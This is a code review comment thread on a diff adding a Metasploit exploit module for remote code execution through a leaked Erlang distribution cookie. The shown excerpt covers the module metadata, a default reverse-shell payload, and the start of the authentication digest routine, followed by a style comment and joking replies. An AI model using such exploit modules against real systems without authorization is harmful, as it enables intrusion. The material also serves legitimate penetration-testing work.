modules/exploits/multi/erlang_cookie_rce.rb

```diff
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Erlang Port Mapper Daemon Cookie RCE',
+        'Description'    => %q{
+          The erlang port mapper daemon is used to coordinate distributed erlang instances.
+          Should an attacker get the authentication cookie RCE is trivial. Usually, this
+          cookie is named ".erlang.cookie" and varies on location.
+        },
+        'Author'         =>
+          [
+            'Daniel Mende',              # discovery / blog post
+            'Milton Valencia (wetw0rk)', # metasploit module
+          ],
+        'References'     =>
+          [
+            ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['unix', 'win'],
+        'Privileged'     => 'false',
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'cmd/unix/reverse',
+          },
+        'Arch'           => [ ARCH_CMD ],
+        'Targets'        => [[ 'Automatic Target', {} ]],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Oct 5, 2017',
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),
+        Opt::RPORT(25672)
+      ])
+  end
+
+  def generate_challenge_digest(challenge)
+    challenge = challenge.unpack('H*')[0].to_i(16).to_s
+
+    hash = Digest::MD5.new
+    hash.update datastore['COOKIE']
```

Comment:
Parameters to function calls should be surrounded by parenthesis:
`hash.update(datastore['COOKIE'])`
There are other cases in the module that'll need updating as well.

Reply:
😂

Reply:
Seems OJ is unhappy today. Does the MSF CoC allow virtual hugs?